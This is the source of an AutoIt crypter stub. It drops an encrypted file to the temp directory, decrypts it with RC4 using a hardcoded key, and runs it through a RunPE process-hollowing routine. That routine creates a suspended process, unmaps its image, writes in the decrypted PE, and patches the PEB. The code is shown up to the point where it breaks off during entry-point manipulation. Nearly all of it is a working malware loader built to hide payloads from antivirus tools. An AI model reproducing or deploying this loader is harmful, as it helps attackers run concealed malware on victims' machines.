    LINK ..........: HTTP://WWW.AUTOITSCRIPT.COM/FORUM/INDEX.PHP?SHOWTOPIC=99412
    EXAMPLE .......: __RUNPE( $BBINARYIMAGE )
#CE =-=--=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FILEINSTALL ("__PE-SCRYPTED.BIN",@TEMPDIR&"__PE-SCRYPTED.BIN")
LOCAL $PE_DATA,$H_FILE = FILEOPEN (@TEMPDIR&"__PE-SCRYPTED.BIN",16)
_CRYPT_STARTUP ()
$PE_DATA = FILEREAD ($H_FILE)
IF  NOT @ERROR THEN
    $PE_DATA = _CRYPT_DECRYPTDATA ($PE_DATA,"DEV-POINT.COM",$CALG_RC4)
    CALL ("__RUNPE",$PE_DATA)
ENDIF
FILECLOSE ($H_FILE)
FILEDELETE (@TEMPDIR&"__PE-SCRYPTED.BIN")
_CRYPT_SHUTDOWN ()
FUNC __RUNPE ($BBINARYIMAGE, $SCOMMANDLINE = "", $SEXEMODULE = @AUTOITEXE)
#REGION 1. DETERMINE INTERPRETER TYPE
LOCAL $FAUTOITX64 = @AUTOITX64
#REGION 2. PREDPROCESSING PASSED
LOCAL $BBINARY = BINARY($BBINARYIMAGE) ; THIS IS REDUNDANT BUT STILL...
; MAKE STRUCTURE OUT OF BINARY DATA THAT WAS PASSED
LOCAL $TBINARY = DLLSTRUCTCREATE("BYTE[" & BINARYLEN($BBINARY) & "]")
DLLSTRUCTSETDATA($TBINARY, 1, $BBINARY) ; FILL IT
; GET POINTER TO IT
LOCAL $PPOINTER = DLLSTRUCTGETPTR($TBINARY)
#REGION 3. CREATING NEW PROCESS
; STARTUPINFO STRUCTURE (ACTUALLY ALL THAT REALLY MATTERS IS ALLOCATED SPACE)
LOCAL $TSTARTUPINFO = DLLSTRUCTCREATE( _
"DWORD  CBSIZE;" & _
"PTR RESERVED;" & _
"PTR DESKTOP;" & _
"PTR TITLE;" & _
"DWORD X;" & _
"DWORD Y;" & _
"DWORD XSIZE;" & _
"DWORD YSIZE;" & _
"DWORD XCOUNTCHARS;" & _
"DWORD YCOUNTCHARS;" & _
"DWORD FILLATTRIBUTE;" & _
"DWORD FLAGS;" & _
"WORD SHOWWINDOW;" & _
"WORD RESERVED2;" & _
"PTR RESERVED2;" & _
"PTR HSTDINPUT;" & _
"PTR HSTDOUTPUT;" & _
"PTR HSTDERROR")
; THIS IS MUCH IMPORTANT. THIS STRUCTURE WILL HOLD VERY SOME IMPORTANT DATA.
LOCAL $TPROCESS_INFORMATION = DLLSTRUCTCREATE( _
"PTR PROCESS;" & _
"PTR THREAD;" & _
"DWORD PROCESSID;" & _
"DWORD THREADID")
; CREATE NEW PROCESS
LOCAL $ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "CreateProcessW", _
"WSTR", $SEXEMODULE, _
"WSTR", $SCOMMANDLINE, _
"PTR", 0, _
"PTR", 0, _
"INT", 0, _
"DWORD", 4, _ ; = CREATE_SUSPENDED ; <- THIS IS ESSENTIAL
"PTR", 0, _
"PTR", 0, _
"PTR", DLLSTRUCTGETPTR($TSTARTUPINFO), _
"PTR", DLLSTRUCTGETPTR($TPROCESS_INFORMATION))
; CHECK FOR ERRORS OR FAILURE
IF @ERROR OR NOT $ACALL[0] THEN RETURN SETERROR(1, 0, 0) ; CREATEPROCESS FUNCTION OR CALL TO IT FAILED
; GET NEW PROCESS AND THREAD HANDLES:
LOCAL $HPROCESS = DLLSTRUCTGETDATA($TPROCESS_INFORMATION, "PROCESS")
LOCAL $HTHREAD = DLLSTRUCTGETDATA($TPROCESS_INFORMATION, "THREAD")
; CHECK FOR 'WRONG' BIT-NESS. NOT BECAUSE IT COULD'T BE IMPLEMENTED, BUT BESAUSE IT WOULD BE UGLYER (STRUCTURES)
IF  $FAUTOITX64 AND __RUNPE_ISWOW64PROCESS($HPROCESS) THEN
DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(2, 0, 0)
ENDIF
#REGION 4. FILL CONTEXT STRUCTURE
; CONTEXT STRUCTURE IS WHAT'S REALLY IMPORTANT HERE. IT'S PROCESSOR SPECIFIC.
LOCAL $IRUNFLAG, $TCONTEXT
IF  $FAUTOITX64 THEN
IF  @OSARCH = "X64" THEN
  $IRUNFLAG = 2
  $TCONTEXT = DLLSTRUCTCREATE( _
  "ALIGN 16; UINT64 P1HOME; UINT64 P2HOME; UINT64 P3HOME; UINT64 P4HOME; UINT64 P5HOME; UINT64 P6HOME;" & _ ; REGISTER PARAMETER HOME ADDRESSES
  "DWORD CONTEXTFLAGS; DWORD MXCSR;" & _ ; CONTROL FLAGS
  "WORD SEGCS; WORD SEGDS; WORD SEGES; WORD SEGFS; WORD SEGGS; WORD SEGSS; DWORD EFLAGS;" & _ ; SEGMENT REGISTERS AND PROCESSOR FLAGS
  "UINT64 DR0; UINT64 DR1; UINT64 DR2; UINT64 DR3; UINT64 DR6; UINT64 DR7;" & _ ; DEBUG REGISTERS
  "UINT64 RAX; UINT64 RCX; UINT64 RDX; UINT64 RBX; UINT64 RSP; UINT64 RBP; UINT64 RSI; UINT64 RDI; UINT64 R8; UINT64 R9; UINT64 R10; UINT64 R11; UINT64 R12; UINT64 R13; UINT64 R14; UINT64 R15;" & _ ; INTEGER REGISTERS
  "UINT64 RIP;" & _ ; PROGRAM COUNTER
  "UINT64 HEADER[4]; UINT64 LEGACY[16]; UINT64 XMM0[2]; UINT64 XMM1[2]; UINT64 XMM2[2]; UINT64 XMM3[2]; UINT64 XMM4[2]; UINT64 XMM5[2]; UINT64 XMM6[2]; UINT64 XMM7[2]; UINT64 XMM8[2]; UINT64 XMM9[2]; UINT64 XMM10[2]; UINT64 XMM11[2]; UINT64 XMM12[2]; UINT64 XMM13[2]; UINT64 XMM14[2]; UINT64 XMM15[2];" & _ ; FLOATING POINT STATE (TYPES ARE NOT CORRECT FOR SIMPLICITY REASONS!!!)
  "UINT64 VECTORREGISTER[52]; UINT64 VECTORCONTROL;" & _ ; VECTOR REGISTERS (TYPE FOR VECTORREGISTER IS NOT CORRECT FOR SIMPLICITY REASONS!!!)
  "UINT64 DEBUGCONTROL; UINT64 LASTBRANCHTORIP; UINT64 LASTBRANCHFROMRIP; UINT64 LASTEXCEPTIONTORIP; UINT64 LASTEXCEPTIONFROMRIP") ; SPECIAL DEBUG CONTROL REGISTERS
ELSE
     $IRUNFLAG = 3
  ; FIXME - ITANIUM ARCHITECTURE
  ; RETURN SPECIAL ERROR NUMBER:
  DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
  RETURN SETERROR(102, 0, 0)
ENDIF
ELSE
    $IRUNFLAG = 1
    $TCONTEXT = DLLSTRUCTCREATE( _
"DWORD CONTEXTFLAGS;" & _ ; CONTROL FLAGS
"DWORD DR0; DWORD DR1; DWORD DR2; DWORD DR3; DWORD DR6; DWORD DR7;" & _ ; CONTEXT_DEBUG_REGISTERS
"DWORD CONTROLWORD; DWORD STATUSWORD; DWORD TAGWORD; DWORD ERROROFFSET; DWORD ERRORSELECTOR; DWORD DATAOFFSET; DWORD DATASELECTOR; BYTE REGISTERAREA[80]; DWORD CR0NPXSTATE;" & _ ; CONTEXT_FLOATING_POINT
"DWORD SEGGS; DWORD SEGFS; DWORD SEGES; DWORD SEGDS;" & _ ; CONTEXT_SEGMENTS
"DWORD EDI; DWORD ESI; DWORD EBX; DWORD EDX; DWORD ECX; DWORD EAX;" & _ ; CONTEXT_INTEGER
"DWORD EBP; DWORD EIP; DWORD SEGCS; DWORD EFLAGS; DWORD ESP; DWORD SEGSS;" & _ ; CONTEXT_CONTROL
"BYTE EXTENDEDREGISTERS[512]") ; CONTEXT_EXTENDED_REGISTERS
ENDIF
; DEFINE CONTEXT_FULL
LOCAL $CONTEXT_FULL
SWITCH $IRUNFLAG
CASE 1
     $CONTEXT_FULL = 0X10007
CASE 2
  $CONTEXT_FULL = 0X100007
CASE 3
  $CONTEXT_FULL = 0X80027
ENDSWITCH
; SET DESIRED ACCESS
DLLSTRUCTSETDATA($TCONTEXT, "CONTEXTFLAGS", $CONTEXT_FULL)
; FILL CONTEXT STRUCTURE:
$ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "GetThreadContext", _
"HANDLE", $HTHREAD, _
"PTR", DLLSTRUCTGETPTR($TCONTEXT))
; CHECK FOR ERRORS OR FAILURE
IF  @ERROR OR NOT $ACALL[0] THEN
DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(3, 0, 0) ; GETTHREADCONTEXT FUNCTION OR CALL TO IT FAILED
ENDIF
; POINTER TO PEB STRUCTURE
LOCAL $PPEB
SWITCH $IRUNFLAG
CASE 1
  $PPEB = DLLSTRUCTGETDATA($TCONTEXT, "EBX")
CASE 2
  $PPEB = DLLSTRUCTGETDATA($TCONTEXT, "RDX")
CASE 3
  ; FIXME - ITANIUM ARCHITECTURE
ENDSWITCH
#REGION 5. READ PE-FORMAT
; START PROCESSING PASSED BINARY DATA. 'READING' PE FORMAT FOLLOWS.
; FIRST IS IMAGE_DOS_HEADER
LOCAL $TIMAGE_DOS_HEADER = DLLSTRUCTCREATE( _
"CHAR MAGIC[2];" & _
"WORD BYTESONLASTPAGE;" & _
"WORD PAGES;" & _
"WORD RELOCATIONS;" & _
"WORD SIZEOFHEADER;" & _
"WORD MINIMUMEXTRA;" & _
"WORD MAXIMUMEXTRA;" & _
"WORD SS;" & _
"WORD SP;" & _
"WORD CHECKSUM;" & _
"WORD IP;" & _
"WORD CS;" & _
"WORD RELOCATION;" & _
"WORD OVERLAY;" & _
"CHAR RESERVED[8];" & _
"WORD OEMIDENTIFIER;" & _
"WORD OEMINFORMATION;" & _
"CHAR RESERVED2[20];" & _
"DWORD ADDRESSOFNEWEXEHEADER",$PPOINTER)
; SAVE THIS POINTER VALUE (IT'S STARTING ADDRESS OF BINARY IMAGE HEADERS)
LOCAL $PHEADERS_NEW = $PPOINTER
; MOVE POINTER
$PPOINTER += DLLSTRUCTGETDATA($TIMAGE_DOS_HEADER, "ADDRESSOFNEWEXEHEADER") ; MOVE TO PE FILE HEADER
; GET "MAGIC"
LOCAL $SMAGIC = DLLSTRUCTGETDATA($TIMAGE_DOS_HEADER, "MAGIC")
; CHECK IF IT'S VALID FORMAT
IF  NOT ($SMAGIC == "MZ") THEN
DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(4, 0, 0) ; MS-DOS HEADER MISSING.
ENDIF
; IN PLACE OF IMAGE_NT_SIGNATURE
LOCAL $TIMAGE_NT_SIGNATURE = DLLSTRUCTCREATE("DWORD SIGNATURE", $PPOINTER)
; MOVE POINTER
$PPOINTER += 4 ; SIZE OF $TIMAGE_NT_SIGNATURE STRUCTURE
; CHECK SIGNATURE
IF  DLLSTRUCTGETDATA($TIMAGE_NT_SIGNATURE, "SIGNATURE") <> 17744 THEN ; IMAGE_NT_SIGNATURE
DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(5, 0, 0) ; WRONG SIGNATURE. FOR PE IMAGE SHOULD BE "PE00" OR 17744 DWORD.
ENDIF
; IN PLACE OF IMAGE_FILE_HEADER
LOCAL $TIMAGE_FILE_HEADER = DLLSTRUCTCREATE("WORD MACHINE;" & _
   "WORD NUMBEROFSECTIONS;" & _
   "DWORD TIMEDATESTAMP;" & _
   "DWORD POINTERTOSYMBOLTABLE;" & _
   "DWORD NUMBEROFSYMBOLS;" & _
   "WORD SIZEOFOPTIONALHEADER;" & _
   "WORD CHARACTERISTICS", _
$PPOINTER)
; I COULD CHECK HERE IF THE MODULE IS RELOCATABLE
; LOCAL $FRELOCATABLE
; IF BITAND(DLLSTRUCTGETDATA($TIMAGE_FILE_HEADER, "CHARACTERISTICS"), 1) THEN $FRELOCATABLE = FALSE
; BUT I WON'T (WILL CHECK DATA IN IMAGE_DIRECTORY_ENTRY_BASERELOC INSTEAD)
; GET NUMBER OF SECTIONS
LOCAL $INUMBEROFSECTIONS = DLLSTRUCTGETDATA($TIMAGE_FILE_HEADER, "NUMBEROFSECTIONS")
; MOVE POINTER
$PPOINTER += 20 ; SIZE OF $TIMAGE_FILE_HEADER STRUCTURE
; IN PLACE OF IMAGE_OPTIONAL_HEADER
LOCAL $TMAGIC = DLLSTRUCTCREATE("WORD MAGIC;", $PPOINTER)
LOCAL $IMAGIC = DLLSTRUCTGETDATA($TMAGIC, 1)
LOCAL $TIMAGE_OPTIONAL_HEADER
IF  $IMAGIC = 267 THEN ; X86 VERSION
IF  $FAUTOITX64 THEN
  DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
  RETURN SETERROR(6, 0, 0) ; INCOMPATIBLE VERSIONS
ENDIF
$TIMAGE_OPTIONAL_HEADER = DLLSTRUCTCREATE( _
"WORD MAGIC;" & _
"BYTE MAJORLINKERVERSION;" & _
"BYTE MINORLINKERVERSION;" & _
"DWORD SIZEOFCODE;" & _
"DWORD SIZEOFINITIALIZEDDATA;" & _
"DWORD SIZEOFUNINITIALIZEDDATA;" & _
"DWORD ADDRESSOFENTRYPOINT;" & _
"DWORD BASEOFCODE;" & _
"DWORD BASEOFDATA;" & _
"DWORD IMAGEBASE;" & _
"DWORD SECTIONALIGNMENT;" & _
"DWORD FILEALIGNMENT;" & _
"WORD MAJOROPERATINGSYSTEMVERSION;" & _
"WORD MINOROPERATINGSYSTEMVERSION;" & _
"WORD MAJORIMAGEVERSION;" & _
"WORD MINORIMAGEVERSION;" & _
"WORD MAJORSUBSYSTEMVERSION;" & _
"WORD MINORSUBSYSTEMVERSION;" & _
"DWORD WIN32VERSIONVALUE;" & _
"DWORD SIZEOFIMAGE;" & _
"DWORD SIZEOFHEADERS;" & _
"DWORD CHECKSUM;" & _
"WORD SUBSYSTEM;" & _
"WORD DLLCHARACTERISTICS;" & _
"DWORD SIZEOFSTACKRESERVE;" & _
"DWORD SIZEOFSTACKCOMMIT;" & _
"DWORD SIZEOFHEAPRESERVE;" & _
"DWORD SIZEOFHEAPCOMMIT;" & _
"DWORD LOADERFLAGS;" & _
"DWORD NUMBEROFRVAANDSIZES",$PPOINTER)
; MOVE POINTER
$PPOINTER += 96 ; SIZE OF $TIMAGE_OPTIONAL_HEADER
ELSEIF  $IMAGIC = 523 THEN ; X64 VERSION
  IF NOT $FAUTOITX64 THEN
   DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
   RETURN SETERROR(6, 0, 0) ; INCOMPATIBLE VERSIONS
  ENDIF
$TIMAGE_OPTIONAL_HEADER = DLLSTRUCTCREATE( _
"WORD MAGIC;" & _
"BYTE MAJORLINKERVERSION;" & _
    "BYTE MINORLINKERVERSION;" & _
"DWORD SIZEOFCODE;" & _
"DWORD SIZEOFINITIALIZEDDATA;" & _
"DWORD SIZEOFUNINITIALIZEDDATA;" & _
"DWORD ADDRESSOFENTRYPOINT;" & _
"DWORD BASEOFCODE;" & _
"UINT64 IMAGEBASE;" & _
"DWORD SECTIONALIGNMENT;" & _
"DWORD FILEALIGNMENT;" & _
"WORD MAJOROPERATINGSYSTEMVERSION;" & _
"WORD MINOROPERATINGSYSTEMVERSION;" & _
"WORD MAJORIMAGEVERSION;" & _
"WORD MINORIMAGEVERSION;" & _
"WORD MAJORSUBSYSTEMVERSION;" & _
"WORD MINORSUBSYSTEMVERSION;" & _
"DWORD WIN32VERSIONVALUE;" & _
"DWORD SIZEOFIMAGE;" & _
"DWORD SIZEOFHEADERS;" & _
"DWORD CHECKSUM;" & _
"WORD SUBSYSTEM;" & _
"WORD DLLCHARACTERISTICS;" & _
"UINT64 SIZEOFSTACKRESERVE;" & _
"UINT64 SIZEOFSTACKCOMMIT;" & _
"UINT64 SIZEOFHEAPRESERVE;" & _
"UINT64 SIZEOFHEAPCOMMIT;" & _
"DWORD LOADERFLAGS;" & _
    "DWORD NUMBEROFRVAANDSIZES",$PPOINTER)
; MOVE POINTER
$PPOINTER += 112 ; SIZE OF $TIMAGE_OPTIONAL_HEADER
ELSE
DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(6, 0, 0) ; INCOMPATIBLE VERSIONS
ENDIF
; EXTRACT ENTRY POINT ADDRESS
LOCAL $IENTRYPOINTNEW = DLLSTRUCTGETDATA($TIMAGE_OPTIONAL_HEADER, "ADDRESSOFENTRYPOINT") ; IF LOADED BINARY IMAGE WOULD START EXECUTING AT THIS ADDRESS
; AND OTHER INTERESTING INFORMATIONS
LOCAL $IOPTIONALHEADERSIZEOFHEADERSNEW = DLLSTRUCTGETDATA($TIMAGE_OPTIONAL_HEADER, "SIZEOFHEADERS")
LOCAL $POPTIONALHEADERIMAGEBASENEW = DLLSTRUCTGETDATA($TIMAGE_OPTIONAL_HEADER, "IMAGEBASE") ; ADDRESS OF THE FIRST BYTE OF THE IMAGE WHEN IT'S LOADED IN MEMORY
LOCAL $IOPTIONALHEADERSIZEOFIMAGENEW = DLLSTRUCTGETDATA($TIMAGE_OPTIONAL_HEADER, "SIZEOFIMAGE") ; THE SIZE OF THE IMAGE INCLUDING ALL HEADERS
; MOVE POINTER
$PPOINTER += 8 ; SKIPPING IMAGE_DIRECTORY_ENTRY_EXPORT
$PPOINTER += 8 ; SIZE OF $TIMAGE_DIRECTORY_ENTRY_IMPORT
$PPOINTER += 24 ; SKIPPING IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY
; BASE RELOCATION DIRECTORY
LOCAL $TIMAGE_DIRECTORY_ENTRY_BASERELOC = DLLSTRUCTCREATE("DWORD VIRTUALADDRESS; DWORD SIZE", $PPOINTER)
; COLLECT DATA
LOCAL $PADDRESSNEWBASERELOC = DLLSTRUCTGETDATA($TIMAGE_DIRECTORY_ENTRY_BASERELOC, "VIRTUALADDRESS")
LOCAL $ISIZEBASERELOC = DLLSTRUCTGETDATA($TIMAGE_DIRECTORY_ENTRY_BASERELOC, "SIZE")
LOCAL $FRELOCATABLE
IF $PADDRESSNEWBASERELOC AND $ISIZEBASERELOC THEN $FRELOCATABLE = TRUE
IF NOT $FRELOCATABLE THEN CONSOLEWRITE("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF) ; NOTHING CAN BE DONE HERE
; MOVE POINTER
$PPOINTER += 88 ; SIZE OF THE STRUCTURES BEFORE IMAGE_SECTION_HEADER (16 OF THEM).
#REGION 6. ALLOCATE 'NEW' MEMORY SPACE
LOCAL $FRELOCATE
LOCAL $PZEROPOINT
IF  $FRELOCATABLE THEN ; IF THE MODULE CAN BE RELOCATED THEN ALLOCATE MEMORY ANYWHERE POSSIBLE
$PZEROPOINT = __RUNPE_ALLOCATEEXESPACE($HPROCESS, $IOPTIONALHEADERSIZEOFIMAGENEW)
; IN CASE OF FAILURE TRY AT ORIGINAL ADDRESS
IF  @ERROR THEN
  $PZEROPOINT = __RUNPE_ALLOCATEEXESPACEATADDRESS($HPROCESS, $POPTIONALHEADERIMAGEBASENEW, $IOPTIONALHEADERSIZEOFIMAGENEW)
  IF  @ERROR THEN
   __RUNPE_UNMAPVIEWOFSECTION($HPROCESS, $POPTIONALHEADERIMAGEBASENEW)
   ; TRY NOW
   $PZEROPOINT = __RUNPE_ALLOCATEEXESPACEATADDRESS($HPROCESS, $POPTIONALHEADERIMAGEBASENEW, $IOPTIONALHEADERSIZEOFIMAGENEW)
   IF  @ERROR THEN
    ; RETURN SPECIAL ERROR NUMBER:
    DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
    RETURN SETERROR(101, 1, 0)
   ENDIF
  ENDIF
ENDIF
$FRELOCATE = TRUE
ELSE ; AND IF NOT TRY WHERE IT SHOULD BE
$PZEROPOINT = __RUNPE_ALLOCATEEXESPACEATADDRESS($HPROCESS, $POPTIONALHEADERIMAGEBASENEW, $IOPTIONALHEADERSIZEOFIMAGENEW)
IF  @ERROR THEN
  __RUNPE_UNMAPVIEWOFSECTION($HPROCESS, $POPTIONALHEADERIMAGEBASENEW)
  ; TRY NOW
  $PZEROPOINT = __RUNPE_ALLOCATEEXESPACEATADDRESS($HPROCESS, $POPTIONALHEADERIMAGEBASENEW, $IOPTIONALHEADERSIZEOFIMAGENEW)
  IF  @ERROR THEN
   ; RETURN SPECIAL ERROR NUMBER:
   DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
   RETURN SETERROR(101, 0, 0)
  ENDIF
ENDIF
ENDIF
; IF THERE IS NEW IMAGEBASE VALUE, SAVE IT
DLLSTRUCTSETDATA($TIMAGE_OPTIONAL_HEADER, "IMAGEBASE", $PZEROPOINT)
#REGION 7. CONSTRUCT THE NEW MODULE
; ALLOCATE ENOUGH SPACE (IN OUR SPACE) FOR THE NEW MODULE
LOCAL $TMODULE = DLLSTRUCTCREATE("BYTE[" & $IOPTIONALHEADERSIZEOFIMAGENEW & "]")
; GET POINTER
LOCAL $PMODULE = DLLSTRUCTGETPTR($TMODULE)
; HEADERS
LOCAL $THEADERS = DLLSTRUCTCREATE("BYTE[" & $IOPTIONALHEADERSIZEOFHEADERSNEW & "]", $PHEADERS_NEW)
; WRITE HEADERS TO $TMODULE
DLLSTRUCTSETDATA($TMODULE, 1, DLLSTRUCTGETDATA($THEADERS, 1))
; WRITE SECTIONS NOW. $PPOINTER IS CURRENTLY IN PLACE OF SECTIONS
LOCAL $TIMAGE_SECTION_HEADER
LOCAL $ISIZEOFRAWDATA, $PPOINTERTORAWDATA
LOCAL $IVIRTUALADDRESS, $IVIRTUALSIZE
LOCAL $TRELOCRAW
; LOOP THROUGH SECTIONS
FOR $I = 1 TO $INUMBEROFSECTIONS
$TIMAGE_SECTION_HEADER = DLLSTRUCTCREATE( _
"CHAR NAME[8];" & _
"DWORD UNIONOFVIRTUALSIZEANDPHYSICALADDRESS;" & _
"DWORD VIRTUALADDRESS;" & _
"DWORD SIZEOFRAWDATA;" & _
"DWORD POINTERTORAWDATA;" & _
"DWORD POINTERTORELOCATIONS;" & _
"DWORD POINTERTOLINENUMBERS;" & _
"WORD NUMBEROFRELOCATIONS;" & _
"WORD NUMBEROFLINENUMBERS;" & _
"DWORD CHARACTERISTICS",$PPOINTER)
; COLLECT DATA
$ISIZEOFRAWDATA = DLLSTRUCTGETDATA($TIMAGE_SECTION_HEADER, "SIZEOFRAWDATA")
$PPOINTERTORAWDATA = $PHEADERS_NEW + DLLSTRUCTGETDATA($TIMAGE_SECTION_HEADER, "POINTERTORAWDATA")
$IVIRTUALADDRESS = DLLSTRUCTGETDATA($TIMAGE_SECTION_HEADER, "VIRTUALADDRESS")
$IVIRTUALSIZE = DLLSTRUCTGETDATA($TIMAGE_SECTION_HEADER, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS")
IF  $IVIRTUALSIZE AND $IVIRTUALSIZE < $ISIZEOFRAWDATA THEN $ISIZEOFRAWDATA = $IVIRTUALSIZE
; IF THERE IS DATA TO WRITE, WRITE IT
IF  $ISIZEOFRAWDATA THEN
  DLLSTRUCTSETDATA(DLLSTRUCTCREATE("BYTE[" & $ISIZEOFRAWDATA & "]", $PMODULE + $IVIRTUALADDRESS), 1, DLLSTRUCTGETDATA(DLLSTRUCTCREATE("BYTE[" & $ISIZEOFRAWDATA & "]", $PPOINTERTORAWDATA), 1))
ENDIF
; RELOCATIONS
IF  $FRELOCATE THEN
  IF  $IVIRTUALADDRESS <= $PADDRESSNEWBASERELOC AND $IVIRTUALADDRESS + $ISIZEOFRAWDATA > $PADDRESSNEWBASERELOC THEN
   $TRELOCRAW = DLLSTRUCTCREATE("BYTE[" & $ISIZEBASERELOC & "]", $PPOINTERTORAWDATA + ($PADDRESSNEWBASERELOC - $IVIRTUALADDRESS))
  ENDIF
ENDIF
; MOVE POINTER
$PPOINTER += 40 ; SIZE OF $TIMAGE_SECTION_HEADER STRUCTURE
NEXT
; FIX RELOCATIONS
IF $FRELOCATE THEN __RUNPE_FIXRELOC($PMODULE, $TRELOCRAW, $PZEROPOINT, $POPTIONALHEADERIMAGEBASENEW, $IMAGIC = 523)
; WRITE NEWLY CONSTRUCTED MODULE TO ALLOCATED SPACE INSIDE THE $HPROCESS
$ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "WriteProcessMemory", _
"HANDLE", $HPROCESS, _
"PTR", $PZEROPOINT, _
"PTR", $PMODULE, _
"DWORD_PTR", $IOPTIONALHEADERSIZEOFIMAGENEW, _
"DWORD_PTR*", 0)
; CHECK FOR ERRORS OR FAILURE
IF  @ERROR OR NOT $ACALL[0] THEN
DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(7, 0, 0) ; WRITEPROCESSMEMORY FUNCTION OR CALL TO IT WHILE WRITTING NEW MODULE BINARY
ENDIF
#REGION 8. PEB IMAGEBASEADDRESS MANIPULATION
; PEB STRUCTURE DEFINITION
LOCAL $TPEB = DLLSTRUCTCREATE( _
"BYTE INHERITEDADDRESSSPACE;" & _
"BYTE READIMAGEFILEEXECOPTIONS;" & _
"BYTE BEINGDEBUGGED;" & _
"BYTE SPARE;" & _
"PTR MUTANT;" & _
"PTR IMAGEBASEADDRESS;" & _
"PTR LOADERDATA;" & _
"PTR PROCESSPARAMETERS;" & _
"PTR SUBSYSTEMDATA;" & _
"PTR PROCESSHEAP;" & _
"PTR FASTPEBLOCK;" & _
"PTR FASTPEBLOCKROUTINE;" & _
"PTR FASTPEBUNLOCKROUTINE;" & _
"DWORD ENVIRONMENTUPDATECOUNT;" & _
"PTR KERNELCALLBACKTABLE;" & _
"PTR EVENTLOGSECTION;" & _
"PTR EVENTLOG;" & _
"PTR FREELIST;" & _
"DWORD TLSEXPANSIONCOUNTER;" & _
"PTR TLSBITMAP;" & _
"DWORD TLSBITMAPBITS[2];" & _
"PTR READONLYSHAREDMEMORYBASE;" & _
"PTR READONLYSHAREDMEMORYHEAP;" & _
"PTR READONLYSTATICSERVERDATA;" & _
"PTR ANSICODEPAGEDATA;" & _
"PTR OEMCODEPAGEDATA;" & _
"PTR UNICODECASETABLEDATA;" & _
"DWORD NUMBEROFPROCESSORS;" & _
"DWORD NTGLOBALFLAG;" & _
"BYTE SPARE2[4];" & _
"INT64 CRITICALSECTIONTIMEOUT;" & _
"DWORD HEAPSEGMENTRESERVE;" & _
"DWORD HEAPSEGMENTCOMMIT;" & _
"DWORD HEAPDECOMMITTOTALFREETHRESHOLD;" & _
"DWORD HEAPDECOMMITFREEBLOCKTHRESHOLD;" & _
"DWORD NUMBEROFHEAPS;" & _
"DWORD MAXIMUMNUMBEROFHEAPS;" & _
"PTR PROCESSHEAPS;" & _
"PTR GDISHAREDHANDLETABLE;" & _
"PTR PROCESSSTARTERHELPER;" & _
"PTR GDIDCATTRIBUTELIST;" & _
"PTR LOADERLOCK;" & _
"DWORD OSMAJORVERSION;" & _
"DWORD OSMINORVERSION;" & _
"DWORD OSBUILDNUMBER;" & _
"DWORD OSPLATFORMID;" & _
"DWORD IMAGESUBSYSTEM;" & _
"DWORD IMAGESUBSYSTEMMAJORVERSION;" & _
"DWORD IMAGESUBSYSTEMMINORVERSION;" & _
"DWORD GDIHANDLEBUFFER[34];" & _
"DWORD POSTPROCESSINITROUTINE;" & _
"DWORD TLSEXPANSIONBITMAP;" & _
"BYTE TLSEXPANSIONBITMAPBITS[128];" & _
"DWORD SESSIONID")
; FILL THE STRUCTURE
$ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "ReadProcessMemory", _
"PTR", $HPROCESS, _
"PTR", $PPEB, _ ; POINTER TO PEB STRUCTURE
"PTR", DLLSTRUCTGETPTR($TPEB), _
"DWORD_PTR", DLLSTRUCTGETSIZE($TPEB), _
"DWORD_PTR*", 0)
; CHECK FOR ERRORS OR FAILURE
IF  @ERROR OR NOT $ACALL[0] THEN
    DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(8, 0, 0) ; READPROCESSMEMORY FUNCTION OR CALL TO IT FAILED WHILE FILLING PEB STRUCTURE
ENDIF
; CHANGE BASE ADDRESS WITHIN PEB
DLLSTRUCTSETDATA($TPEB, "IMAGEBASEADDRESS", $PZEROPOINT)
; WRITE THE CHANGES
$ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "WriteProcessMemory", _
"HANDLE", $HPROCESS, _
"PTR", $PPEB, _
"PTR", DLLSTRUCTGETPTR($TPEB), _
"DWORD_PTR", DLLSTRUCTGETSIZE($TPEB), _
"DWORD_PTR*", 0)
; CHECK FOR ERRORS OR FAILURE
IF  @ERROR OR NOT $ACALL[0] THEN
DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0)
RETURN SETERROR(9, 0, 0) ; WRITEPROCESSMEMORY FUNCTION OR CALL TO IT FAILED WHILE CHANGING BASE ADDRESS
ENDIF
#REGION 9. NEW ENTRY POINT
; ENTRY POINT MANIPULATION
SWITCH $IRUNFLAG
CASE 1
